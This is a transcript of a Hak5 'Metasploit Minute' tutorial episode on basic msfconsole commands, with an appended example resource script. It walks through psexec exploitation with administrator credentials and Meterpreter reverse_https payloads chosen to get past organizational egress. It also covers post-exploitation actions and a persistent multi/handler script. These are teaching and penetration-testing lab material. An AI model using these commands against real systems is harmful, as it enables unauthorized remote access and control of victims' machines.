Transcript for:
Essential Metasploit Commands Overview

Basic commands this time on Metasploit Minute. This Metasploit Minute is brought to you by Hak5 and viewers like you. Support us directly at HAKshop.com.

Welcome to Metasploit Minute, the breakdown on breaking in. I'm your host Rob Fuller, but you can call me Mubix. Today we're going to be going over the basic commands of MSF. First and foremost, we are definitely going to have to show you how to get the cow. So here we go. All you have to do is type banner. That's it. And just keep going until you get that cow, because that's the only way anything's ever going to work. Or you can exit. We have a session, so let's just get the banner. Might take a second. There we go. So now, once we have the banner, the cowsay banner, the one that we actually want to use, we have to then look at what other commands we can use. So unlike what I said in the last segment, to show the commands in msfconsole, you can type a question mark, a lot like a Cisco router. So if you scroll up, you can see there's a ton of commands, but the one you're going to use the most is use. So use, and then you start using the things that you have. So we're going to type banner one more time, and you can see that there are exploits, auxiliary modules, post modules, payloads, encoders, and nops. So the cool thing about this is that it's based on a directory structure. So if you look at... we're going to be using the psexec module. So if you look in here you have the msf, or Metasploit, directory, then in modules: exploits, windows, smb, and then there's the psexec that we're going to be using. So use windows, or sorry, exploits/windows/smb/psexec, and that's it. Now we're in the psexec module. Now I've gone ahead and set a few... show options shows what's already set and what options are available. Now I've set a few options here already, like the IP address of my target, the password, the username that I'm going to psexec against, and then the payload.
Now I really don't like reverse TCP, because it's a straight TCP connection and will rarely get out of most organizations. So we're going to actually change the payload to something else. We're going to say set payload. Now you can use these options as lowercase options, but I would recommend sticking with the uppercase option, simply because there are other things inside of Metasploit that can go wrong if you don't use all uppercase. Set PAYLOAD, or use the case-sensitive version of whatever options you're using. Payload to windows/meterpreter/reverse_https. So we're going to switch that. Now you can see that our options are similar, LHOST and LPORT. So we're just going to change the LPORT to 443. Then, so we've set different things. Now what we need to do is exploit. Exploit has options. As I said, anything with a dash, you can do -h and you find different things with it. So I'm going to exploit -j. Now what that does is set it as a job, and we'll see what a job means in a second. So while it's going, I can actually run other things. And hopefully in a second get a payload out of this. No, maybe not. That didn't work, but... Oh, there it is. Ha! Just had to wait a second. So, now that we have a session, we can do sessions and see our different sessions. So, in auxiliary modules, what you want to do is use run. So you have exploit in exploit modules, and in all the auxiliary modules you want to do run. And then in payload modules, you actually have another command: you can say generate. So, now let's take a look at another command. One of the things that you'll get intimately familiar with once we start actually making payloads is irb and edit. So irb, if you've used Ruby before, is the interpreter for Ruby. And the great thing about irb inside of Metasploit is it's in the context of wherever you are.
So if you're in a session... so we're going to do sessions -i, and let's do a help real quick to show you what those are. If you do sessions -i, which says interact with it, and we say 1, we want to interact with session one, which is right here, we can do irb. And that puts us in the context of our Meterpreter session. So now we can basically run any Ruby code that we want, a loop, an if statement, anything that we want, straight in Ruby on the host it is. Now it's not executing the Ruby on the host, but it's executing in the context of Meterpreter. So if you want to upload a file or download a file or do a bunch of other things, and we'll be talking about that when we actually make modules, you can do that straight from here. So let's do a quick one: client.railgun, and we'll be talking about what Railgun is, .user32, that's the DLL that we're going to be talking to. I think it's LockWorkStation. If we were on that system, what we actually did right there is lock that workstation. So it went to its login screen. So that's cool stuff that we can do with Railgun, and we'll talk about that later. But what if we wanted to edit a file? So let's do an ls real quick. Oh, that's in system32, which is not a good idea. So let's go to the C: directory. See, there's dial.bat. Let's edit dial.bat. What that'll do is get us straight into an editor of our choice. And as soon as we exit out of it, it will first download it so that we can edit it, and then re-upload it, whatever options we have. So, a cool way to edit a file directly on the target host. If we go back around into this, if we type edit here, we're actually editing the module inside of Metasploit. So, if we make changes, it will automatically get reloaded. So, if say we wanted to change, just for instance, we wanted to say, "This isn't Microsoft." Oops, I can't... how do you... Yeah, yeah, yeah. There we go. "This is Bob." And then... stupid Vi. Right, quit. So, now it's changed.
So if we do info on it... I have to reload. So reload. And then info. If we scroll up, we now have "Bob's Windows Authenticated Code Execution". Cool stuff. So when we start making more modules and writing things, we'll be using this a lot so that we don't have to jump out of our stuff. Another fun one is load. Now, load actually loads plugins for Metasploit. And there's a bunch of different plugins. If you just tab-complete it, you can see some of them. If you're in the directory structure, you can go to plugins and list them there. There's a lot of cool plugins. One of our favorites, one of my favorites, is the sound plugin written by this guy named DigiNinja. You might know him as Robin Wood. Let's see if it'll make a sound. Okay, so it's not making a sound for some reason, but if you had your VM directly connected to your output and it wasn't muted, it would actually make sounds. It actually makes sounds every time you make a connection to a session. So next up, that's load. And in the context of Meterpreter, sessions -i 1, load incognito, it actually loads extensions onto Meterpreter. So different context means different things. And it's kind of a little bit confusing, but there's really only two contexts: inside of a module or inside of a Meterpreter session. The next one that's fun is save. Now save, say I want to do a lot of demos and I want to make it so that I can get back into that demo really quickly. Well, save saves your configuration, the current settings, your variables on a global scale, your variables at a module scale, into a file, the slash config. Now real quick, let's look at what's in that file now. You'll see that the configuration things that are in here are the module I was in, the different options that were set, and some of these you didn't see just because they're advanced options. And that's pretty much it, and it shows you what active module I'm in.
So if I exit out of this and say, yes, I don't care that I had sessions, and I go back into msfconsole, what we should be is in that module with all of those settings. All right, so we're back in, show options, and for some reason, none of those settings are there. Awesome. That's weird. Oh, it didn't even save the SMB client. Okay, so that's a bug, and we'll submit that as a bug later. So what if that happens, though? What if there are things that don't save correctly? So let's set SMBUser, and this is the next command we're going to talk about. So let's save, or let's show you a different thing. So let's set SMBUser to administrator, set SMBPass to that. So options, show options, see if everything's set correctly. Exploit. Logon type not granted. Weird. Okay. Nope. But it created a session for some reason. Whatever. It worked. Alright, if we type save, it's going to do that same thing. If we look back into here, oh, it did save the SMB user and pass this time. But let's say it didn't. We can do a makerc, and we'll talk about resource files in another segment, but what this does is take all of the commands that you've typed since you started, every single step of the way, using a bunch of different modules, a bunch of different steps, and creates a resource script. And you can load these resource scripts in a bunch of cool ways. So we're going to say makerc exploit example.rc. Added all of those nine commands. We go into our Metasploit directory because that's where we are. Exploit example, and there it is. Those are all the commands that we typed from start to finish. And what we want to definitely do is remove, makerc, or save and makerc. Alright, so those are some of the commands, and we've exploited our first box, we've created sessions. How about searching for other modules? Now, what we could do is simply go into the modules directory and find, or grep, or anything else we wanted to do. It's quick, easy command line.
Anyone who knows Unix can do that kind of stuff. There's also a search inside of Metasploit that you can search for things with. So if we wanted to search psexec and find all of the psexec modules, now we can see that there are a bunch of different modules that do psexec, and they're in different directories. So there's an auxiliary module that does psexec, an exploit module, the local exploit that does psexec. So that might help us find things a little easier than we might have with the modules directory. So, sessions. We've already kind of gone over it, but there's a bunch of things you can do with sessions, including terminating sessions, detaching interactive sessions, listing sessions, quiet mode, all of these other cool fun things. And then finally, jobs. Now, there aren't any jobs right now because we haven't set up anything to run in the background. We did with our psexec real quick a second ago so that we could show it. But let's say, as an attacker, what I don't like doing is setting up a handler every single time I do an exploit. What I want to have is a handler just listening and taking in all of those exploits, all of those connections back, by themselves. So what I will do is use exploit/multi/handler. So this multi handler will take all those payload connections in. We set our payload in here, windows/meterpreter/reverse_https. It's going to take a second to load it. Set our options. So LHOST, what is my IP address? So 128. So 2.168.16.102.128. Set LPORT to 443. Set ExitOnSession. So this is the important part. Set ExitOnSession to false. That way we're actually not going to close the handler after it's done. And then exploit -j makes it a job. Now anytime we get a session in, it's going to go to this handler. That way we can get a ton of sessions in really quickly and never have to deal with it. So jobs -v, and there it is. We'll be going into a lot more of each one of these commands.
And I want you to just have something to play with initially. So let me know what you think, hit me up at msf@hak5.org. Stay tuned to Metasploitminute.com for more shows like these. Thank you again for supporting the show. If you want to support us even more, you can go to HAKshop.com and enter the code Mubix to get some free Metasploit Minute stickers. Until next time, I'm Mubix, and I'll be hacking till the cows come home.
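As an added example that is not part of the episode, here is a hand-written resource script of the kind makerc produces, reproducing the persistent handler set up at the end of the episode (the file name and the LHOST value are placeholders; lines starting with # are assumed to be ignored by msfconsole when the file is loaded):

```text
# handler.rc (constructed example, not from the episode)
# Load it with: msfconsole -r handler.rc
# Option names are written in uppercase, as recommended in the episode.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
# Placeholder listener address; replace with the address your payloads call back to
set LHOST 192.0.2.10
set LPORT 443
# The important part: keep the handler alive after the first session arrives
set ExitOnSession false
# Run the handler as a background job so the console stays usable (check with jobs -v)
exploit -j
```

Because makerc records every command typed since the console started, an rc file it writes after the episode's session would also carry the earlier psexec module commands; trim it to the handler lines if that is all you want to replay.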